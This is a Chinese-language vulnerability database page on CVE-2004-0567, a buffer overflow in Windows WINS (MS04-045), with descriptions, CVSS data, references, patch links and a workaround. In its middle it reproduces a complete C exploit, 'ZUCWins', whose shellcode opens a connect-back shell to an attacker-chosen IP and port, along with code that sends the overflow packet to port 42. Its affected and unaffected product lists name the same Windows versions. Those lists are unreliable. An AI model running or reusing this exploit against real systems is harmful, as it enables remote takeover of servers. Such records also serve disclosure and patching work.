CVE-2004-0567
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:38:46
NMCOES    

[原文]The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability."


[CNNVD]Microsoft WINS服务远程缓冲区溢出漏洞(MS04-045)(CNNVD-200412-292)

        
        Microsoft Windows WINS是Microsoft NetBIOS名字服务,用于解析NetBIOS计算机名到IP地址。
        Microsoft Windows WINS在处理关联的内容验证时存在问题,远程攻击者可以利用这个漏洞以系统进程权限执行任意指令。
        由于对名字验证处理时缺少充分验证,攻击者可以构建恶意网络包触发缓冲区溢出,精心构建提交数据可能以系统进程权限执行任意指令。在Windows Server 2003中,目前看起来只能进行拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0567
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0567
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-292
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/378160
(VENDOR_ADVISORY)  CERT-VN  VU#378160
http://xforce.iss.net/xforce/xfdb/18259
(PATCH)  XF  wins-memory-pointer-hijack(18259)
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx
(VENDOR_ADVISORY)  MS  MS04-045
http://www.ciac.org/ciac/bulletins/p-054.shtml
(VENDOR_ADVISORY)  CIAC  P-054
http://www.securityfocus.com/bid/11922
(UNKNOWN)  BID  11922
http://www.osvdb.org/12370
(UNKNOWN)  OSVDB  12370
http://securitytracker.com/id?1012517
(UNKNOWN)  SECTRACK  1012517
http://secunia.com/advisories/13466
(UNKNOWN)  SECUNIA  13466

- 漏洞信息

Microsoft WINS服务远程缓冲区溢出漏洞(MS04-045)
高危 边界条件错误
2004-12-31 00:00:00 2006-04-19 00:00:00
远程  
        
        Microsoft Windows WINS是Microsoft NetBIOS名字服务,用于解析NetBIOS计算机名到IP地址。
        Microsoft Windows WINS在处理关联的内容验证时存在问题,远程攻击者可以利用这个漏洞以系统进程权限执行任意指令。
        由于对名字验证处理时缺少充分验证,攻击者可以构建恶意网络包触发缓冲区溢出,精心构建提交数据可能以系统进程权限执行任意指令。在Windows Server 2003中,目前看起来只能进行拒绝服务攻击。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-045)以及相应补丁:
        MS04-045:Vulnerability in WINS Could Allow Remote Code Execution (870763)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx

        补丁下载:
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=38E9DB8C-5C43-4E9A-9DC9-97C2686A45F1

        
        Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=D7AB3F6F-26FE-4AE8-A07A-481D772D03A6

        
        Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=40146B52-5546-489E-857E-01FE1EF709B2

        
        
        Microsoft Windows Server 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=10836F38-A38B-47D5-B87B-18D8E26EEFAA

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=06CF9E85-C66D-4A7D-B2EB-99DE9423B60F

- 漏洞信息 (733)

MS Windows 2000 WINS Remote Code Execution Exploit (EDBID:733)
windows remote
2004-12-31 Verified
42 zuc
N/A [点击下载]
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit                                     */
/* Exploit by: zuc <zuc@hack.it>              		                         */ 
/* works on Windows 2000 SP3/SP4 probably every language                  */
/*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

	char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
//  "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
	
"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05";
char rep[] =
	
"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{ 
int i,sock,sock2,sock3,addr,len=16;
int rc;
  unsigned long XORIP = 0x93939393;
  unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
	memcpy(mess3+le,rep,sizeof(rep)-1);
	le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct 
sockaddr_in));
printf("[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

// milw0rm.com [2004-12-31]
		

- 漏洞信息

12370
Microsoft Windows WINS Computer Name Validation Remote Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Microsoft Windows. WINS fails to perform proper bounds checking on the 'name' parameter on incoming WINS packets resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-12-14 Unknow
2005-01-02 Unknow

- 解决方案

Microsoft has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the WINS service. 1. Control Panel -> "Add or Remove Programs" 2. "Components" -> "Networking Services" -> "Details". 3. Clear box next to "Windows Internet Naming Service (WINS)"

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows WINS Name Value Handling Remote Buffer Overflow Vulnerability
Boundary Condition Error 11922
Yes No
2004-12-14 12:00:00 2007-11-01 05:06:00
This vulnerability was reported to Microsoft by Kostya Kortchinsky.

- 受影响的程序版本

Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3

- 不受影响的程序版本

Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3

- 漏洞讨论

The WINS server contains a buffer-overflow vulnerability that can allow attackers to corrupt WINS process memory. The issue occurs because the software fails to perform sufficient boundary checks on computer 'name' data that is handled during a WINS transaction.

Ultimately, a WINS client may exploit this issue remotely to execute arbitrary code with SYSTEM-level privileges on a target WINS server. The service may be exposed via TCP/UDP port 42 by default, but the vendor has stated that other attack vectors may exist (though none are known at this time).

- 漏洞利用

An exploit has been released as part of the MetaSploit Framework 2.3.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Microsoft has released updates to address this vulnerability in supported versions of the Windows operating system.


Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Server SP3

Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows NT Enterprise Server 4.0 SP6a

Microsoft Windows 2000 Server SP4

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站